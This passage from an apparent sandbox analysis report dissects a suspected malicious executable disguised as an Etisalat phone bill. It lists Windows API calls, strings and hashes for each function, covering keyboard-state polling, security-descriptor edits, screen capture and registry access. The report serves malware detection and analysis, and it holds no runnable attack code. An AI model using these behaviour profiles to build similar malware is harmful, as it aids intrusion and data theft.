                                      • String ID: :$\$\??\%s
                                      • API String ID: 2733774712-3457252023
                                      • Opcode ID: 79a0cc607a17367c1f361129b5630a6f8789510b9e8b4575d2cb7bae7dd5b6a0
                                      • Instruction ID: a9fe32c5897e4aa5f32ac86bca67e2c0a64eebd8c9686ce12f0aefb047e28a0e
                                      • Opcode Fuzzy Hash: 79a0cc607a17367c1f361129b5630a6f8789510b9e8b4575d2cb7bae7dd5b6a0
                                      • Instruction Fuzzy Hash: 1631607590015AABDB219FA0DC89FFB77BCEF88705F1041BAFA08D6160EB7097458B25
                                      Function 00BEC49C Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00B62612: GetWindowLongW.USER32(?,000000EB), ref: 00B62623
                                      • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00BEC4EC
                                      • GetFocus.USER32 ref: 00BEC4FC
                                      • GetDlgCtrlID.USER32(00000000), ref: 00BEC507
                                      • _memset.LIBCMT ref: 00BEC632
                                      • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00BEC65D
                                      • GetMenuItemCount.USER32(?), ref: 00BEC67D
                                      • GetMenuItemID.USER32(?,00000000), ref: 00BEC690
                                      • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00BEC6C4
                                      • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00BEC70C
                                      • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00BEC744
                                      • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 00BEC779
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                      • String ID: 0
                                      • API String ID: 1296962147-4108050209
                                      • Opcode ID: 589f11a8e865db7b5c5ca39848b57529ac6d0c22f2be29d496869a4f0379834f
                                      • Instruction ID: 12f01c50b4d87ef5ed527473cd07db79228a5b17ad1304b1051286aacd7dc428
                                      • Opcode Fuzzy Hash: 589f11a8e865db7b5c5ca39848b57529ac6d0c22f2be29d496869a4f0379834f
                                      • Instruction Fuzzy Hash: 978180711083819FDB10DF25D885A6BBBE4FB98314F1045ADF99597291DB30DD06CFA2
                                      Function 00BB83F4 Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00BB874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00BB8766
                                        • Part of subcall function 00BB874A: GetLastError.KERNEL32(?,00BB822A,?,?,?), ref: 00BB8770
                                        • Part of subcall function 00BB874A: GetProcessHeap.KERNEL32(00000008,?,?,00BB822A,?,?,?), ref: 00BB877F
                                        • Part of subcall function 00BB874A: HeapAlloc.KERNEL32(00000000,?,00BB822A,?,?,?), ref: 00BB8786
                                        • Part of subcall function 00BB874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00BB879D
                                        • Part of subcall function 00BB87E7: GetProcessHeap.KERNEL32(00000008,00BB8240,00000000,00000000,?,00BB8240,?), ref: 00BB87F3
                                        • Part of subcall function 00BB87E7: HeapAlloc.KERNEL32(00000000,?,00BB8240,?), ref: 00BB87FA
                                        • Part of subcall function 00BB87E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00BB8240,?), ref: 00BB880B
                                      • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00BB8458
                                      • _memset.LIBCMT ref: 00BB846D
                                      • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00BB848C
                                      • GetLengthSid.ADVAPI32(?), ref: 00BB849D
                                      • GetAce.ADVAPI32(?,00000000,?), ref: 00BB84DA
                                      • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00BB84F6
                                      • GetLengthSid.ADVAPI32(?), ref: 00BB8513
                                      • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00BB8522
                                      • HeapAlloc.KERNEL32(00000000), ref: 00BB8529
                                      • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00BB854A
                                      • CopySid.ADVAPI32(00000000), ref: 00BB8551
                                      • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00BB8582
                                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00BB85A8
                                      • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00BB85BC
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                      • String ID:
                                      • API String ID: 3996160137-0
                                      • Opcode ID: 925b5eb1fcbf81df4a4fc777e3774cc2a5986e75b6bf8067829f0db1960d5ebb
                                      • Instruction ID: 4031cbc68191739d8c9782e92ac87255cbbb00ebf9eac12c579404d3d5bb0c5f
                                      • Opcode Fuzzy Hash: 925b5eb1fcbf81df4a4fc777e3774cc2a5986e75b6bf8067829f0db1960d5ebb
                                      • Instruction Fuzzy Hash: 81612B7190020AAFDF10DF95DC85AFEBBB9FF04314F1481A9E915AB291DBB19A05CF60
                                      Function 00BD762D Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetDC.USER32(00000000), ref: 00BD76A2
                                      • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00BD76AE
                                      • CreateCompatibleDC.GDI32(?), ref: 00BD76BA
                                      • SelectObject.GDI32(00000000,?), ref: 00BD76C7
                                      • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00BD771B
                                      • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00BD7757
                                      • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00BD777B
                                      • SelectObject.GDI32(00000006,?), ref: 00BD7783
                                      • DeleteObject.GDI32(?), ref: 00BD778C
                                      • DeleteDC.GDI32(00000006), ref: 00BD7793
                                      • ReleaseDC.USER32(00000000,?), ref: 00BD779E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                      • String ID: (
                                      • API String ID: 2598888154-3887548279
                                      • Opcode ID: 8e52c40fef24fd277c642c53c0958df3dca0296fcdf5a049f1875a488af01318
                                      • Instruction ID: 3c531bc8907076a2c1eff33d4cbfafd90c472984e93557fdd2b71a9abe451ba2
                                      • Opcode Fuzzy Hash: 8e52c40fef24fd277c642c53c0958df3dca0296fcdf5a049f1875a488af01318
                                      • Instruction Fuzzy Hash: 93513975904249EFCB15CFA8CC85EAEBBF9EF48710F14846AF94997311EA31A940CB60
                                      Function 00BCA0B5 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 156COMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadStringW.USER32(00000066,?,00000FFF,00BEFB78), ref: 00BCA0FC
                                        • Part of subcall function 00B67F41: _memmove.LIBCMT ref: 00B67F82
                                      • LoadStringW.USER32(?,?,00000FFF,?), ref: 00BCA11E
                                      • __swprintf.LIBCMT ref: 00BCA177
                                      • __swprintf.LIBCMT ref: 00BCA190
                                      • _wprintf.LIBCMT ref: 00BCA246
                                      • _wprintf.LIBCMT ref: 00BCA264
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: LoadString__swprintf_wprintf$_memmove
                                      • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                      • API String ID: 311963372-2391861430
                                      • Opcode ID: 9d68a6d5da020454f5d4270167ded5ae6a69241189faf5bada349df4895885ec
                                      • Instruction ID: 139a60ce65789db07810ff63d74037325e52375e3e61ea08ebcfa63bea686946
                                      • Opcode Fuzzy Hash: 9d68a6d5da020454f5d4270167ded5ae6a69241189faf5bada349df4895885ec
                                      • Instruction Fuzzy Hash: 8B515C72940219AACF25EBE0CD86EEEB7B9EF04304F1001E5B515720A2EB356F59DB61
                                      Function 00B66BEC Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 478COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00B80B9B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00B66C6C,?,00008000), ref: 00B80BB7
                                        • Part of subcall function 00B648AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00B648A1,?,?,00B637C0,?), ref: 00B648CE
                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00B66D0D
                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00B66E5A
                                        • Part of subcall function 00B659CD: _wcscpy.LIBCMT ref: 00B65A05
                                        • Part of subcall function 00B8387D: _iswctype.LIBCMT ref: 00B83885
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                      • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                      • API String ID: 537147316-1018226102
                                      • Opcode ID: 914fa8098c8682eb35270f85252caba47cf9ac5abf82f30eee88babacfd9434f
                                      • Instruction ID: 6b09f259c9c39b98df420463993b0dbbbc15ed3b3089c85ff2023735a9bbc442
                                      • Opcode Fuzzy Hash: 914fa8098c8682eb35270f85252caba47cf9ac5abf82f30eee88babacfd9434f
                                      • Instruction Fuzzy Hash: 6F02CF311083419FCB24EF24C891AAFBBE5FF99314F0409ADF496972A2DB35D949CB42
                                      Function 00B645DF Relevance: 19.7, APIs: 13, Instructions: 215windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • _memset.LIBCMT ref: 00B645F9
                                      • GetMenuItemCount.USER32(00C26890), ref: 00B9D7CD
                                      • GetMenuItemCount.USER32(00C26890), ref: 00B9D87D
                                      • GetCursorPos.USER32(?), ref: 00B9D8C1
                                      • SetForegroundWindow.USER32(00000000), ref: 00B9D8CA
                                      • TrackPopupMenuEx.USER32(00C26890,00000000,?,00000000,00000000,00000000), ref: 00B9D8DD
                                      • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00B9D8E9
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
                                      • String ID:
                                      • API String ID: 2751501086-0
                                      • Opcode ID: 9b749c0c84f2825768e0748a5da3b2d1a87c4cdf0d44e294bd9e1312e48c9820
                                      • Instruction ID: c696c3d8acf8fe0bf9e9756a4d880b7e4a4d082bf3e7b4025db75e2b19d79270
                                      • Opcode Fuzzy Hash: 9b749c0c84f2825768e0748a5da3b2d1a87c4cdf0d44e294bd9e1312e48c9820
                                      • Instruction Fuzzy Hash: F671E570600246BEEF219F65DC85FAABFE4FF05364F2002A6F515AA1E1CBB55C10DB90
                                      Function 00BE10A5 Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON
                                      Download Yara Rule
                                      APIs
                                      • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00BE0038,?,?), ref: 00BE10BC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: BuffCharUpper
                                      • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                      • API String ID: 3964851224-909552448
                                      • Opcode ID: e6e40d79fc6693192478cf81ea1b13f08ad2637715ad2cd4b34a6cd6901ceea0
                                      • Instruction ID: 94ad8dc5992a70251e92c6a634e745e3ba8462ae94978fdb7bb604c1acc18d73
                                      • Opcode Fuzzy Hash: e6e40d79fc6693192478cf81ea1b13f08ad2637715ad2cd4b34a6cd6901ceea0
                                      • Instruction Fuzzy Hash: 82415C7025028A9BCF10FF95DC91AEE37A5EF16340F2048E4FD915B291DB30AD5ADB51
                                      Function 00BC5569 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00B67D2C: _memmove.LIBCMT ref: 00B67D66
                                        • Part of subcall function 00B67A84: _memmove.LIBCMT ref: 00B67B0D
                                      • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00BC55D2
                                      • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00BC55E8
                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00BC55F9
                                      • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00BC560B
                                      • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00BC561C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: SendString$_memmove
                                      • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                      • API String ID: 2279737902-1007645807
                                      • Opcode ID: 2153f9353c5ba2b7ade43e50fb3763c4ecd3e12fdcd0154255036c41ebbb0f73
                                      • Instruction ID: edf6f10bcf0679271ff72f9e6716ec76baad010b23a595691263a06b6d22cd54
                                      • Opcode Fuzzy Hash: 2153f9353c5ba2b7ade43e50fb3763c4ecd3e12fdcd0154255036c41ebbb0f73
                                      • Instruction Fuzzy Hash: 7511982099115979D720B6A1CC89EFFBBBCEF96B04F8004B9B411A20E2DE645D85C5A1
                                      Function 00BC48F3 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                      • String ID: 0.0.0.0
                                      • API String ID: 208665112-3771769585
                                      • Opcode ID: 832cd1ccf079672f30d4f71821853350099c5bdc39c5d07f77d6f0938153ba96
                                      • Instruction ID: 85b59eb752368aaeefba02391852c3abc338201ccd58a8144a89b3a92703205f
                                      • Opcode Fuzzy Hash: 832cd1ccf079672f30d4f71821853350099c5bdc39c5d07f77d6f0938153ba96
                                      • Instruction Fuzzy Hash: 59119031904125AFCB24AB649C4AFEB77ECDF41710F0401FAF545960A1EFB19A81D761
                                      Function 00BC5217 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • timeGetTime.WINMM ref: 00BC521C
                                        • Part of subcall function 00B80719: timeGetTime.WINMM(?,75A8B400,00B70FF9), ref: 00B8071D
                                      • Sleep.KERNEL32(0000000A), ref: 00BC5248
                                      • EnumThreadWindows.USER32(?,Function_000651CA,00000000), ref: 00BC526C
                                      • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00BC528E
                                      • SetActiveWindow.USER32 ref: 00BC52AD
                                      • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00BC52BB
                                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 00BC52DA
                                      • Sleep.KERNEL32(000000FA), ref: 00BC52E5
                                      • IsWindow.USER32 ref: 00BC52F1
                                      • EndDialog.USER32(00000000), ref: 00BC5302
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                      • String ID: BUTTON
                                      • API String ID: 1194449130-3405671355
                                      • Opcode ID: 4048861ed7a7606e389f66d7d6f688bf79efc3a6a4709be2f471911427b0ab9d
                                      • Instruction ID: ba8f3a11fce41048e53d89bcfc436d407a5f300860a86da54852abfdd081b859
                                      • Opcode Fuzzy Hash: 4048861ed7a7606e389f66d7d6f688bf79efc3a6a4709be2f471911427b0ab9d
                                      • Instruction Fuzzy Hash: 67218070114786AFE7205B34ECC8F397BE9EB95386B0005B8F5029A5B1CF61AD81C731
                                      Function 00BCD7F8 Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00B69997: __itow.LIBCMT ref: 00B699C2
                                        • Part of subcall function 00B69997: __swprintf.LIBCMT ref: 00B69A0C
                                      • CoInitialize.OLE32(00000000), ref: 00BCD855
                                      • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00BCD8E8
                                      • SHGetDesktopFolder.SHELL32(?), ref: 00BCD8FC
                                      • CoCreateInstance.OLE32(00BF2D7C,00000000,00000001,00C1A89C,?), ref: 00BCD948
                                      • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00BCD9B7
                                      • CoTaskMemFree.OLE32(?,?), ref: 00BCDA0F
                                      • _memset.LIBCMT ref: 00BCDA4C
                                      • SHBrowseForFolderW.SHELL32(?), ref: 00BCDA88
                                      • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00BCDAAB
                                      • CoTaskMemFree.OLE32(00000000), ref: 00BCDAB2
                                      • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 00BCDAE9
                                      • CoUninitialize.OLE32(00000001,00000000), ref: 00BCDAEB
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                      • String ID:
                                      • API String ID: 1246142700-0
                                      • Opcode ID: 04cdfdb3e2d88f86375cf0404b749dc46f90bdbe295d003aa293dadd33737aea
                                      • Instruction ID: 37a544835bb0e928f0f1ae8dbba01b66910755dc79e9adf1030712896bb5370c
                                      • Opcode Fuzzy Hash: 04cdfdb3e2d88f86375cf0404b749dc46f90bdbe295d003aa293dadd33737aea
                                      • Instruction Fuzzy Hash: CBB1DC75A00109AFDB14DFA5C889EAEBBF9FF48314B1484A9F509EB261DB30ED45CB50
                                      Function 00BC052C Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetKeyboardState.USER32(?), ref: 00BC05A7
                                      • SetKeyboardState.USER32(?), ref: 00BC0612
                                      • GetAsyncKeyState.USER32(000000A0), ref: 00BC0632
                                      • GetKeyState.USER32(000000A0), ref: 00BC0649
                                      • GetAsyncKeyState.USER32(000000A1), ref: 00BC0678
                                      • GetKeyState.USER32(000000A1), ref: 00BC0689
                                      • GetAsyncKeyState.USER32(00000011), ref: 00BC06B5
                                      • GetKeyState.USER32(00000011), ref: 00BC06C3
                                      • GetAsyncKeyState.USER32(00000012), ref: 00BC06EC
                                      • GetKeyState.USER32(00000012), ref: 00BC06FA
                                      • GetAsyncKeyState.USER32(0000005B), ref: 00BC0723
                                      • GetKeyState.USER32(0000005B), ref: 00BC0731
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: State$Async$Keyboard
                                      • String ID:
                                      • API String ID: 541375521-0
                                      • Opcode ID: dcc03805d6c4ce6e55c2e2ce00dfe2a4bac0be8d9bf562d6f1af2a35d8a62f19
                                      • Instruction ID: 9071ce62d8e4964ddcbb842fa13faf9ae089df1d6c3fcee9555987ff825ce31f
                                      • Opcode Fuzzy Hash: dcc03805d6c4ce6e55c2e2ce00dfe2a4bac0be8d9bf562d6f1af2a35d8a62f19
                                      • Instruction Fuzzy Hash: AE51C920A187885AFB35FBA48455FEABFF4DF12380F0845DE95C25B1C2DA649B4CCB61
                                      Function 00BBC72A Relevance: 18.2, APIs: 12, Instructions: 174COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetDlgItem.USER32(?,00000001), ref: 00BBC746
                                      • GetWindowRect.USER32(00000000,?), ref: 00BBC758
                                      • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00BBC7B6
                                      • GetDlgItem.USER32(?,00000002), ref: 00BBC7C1
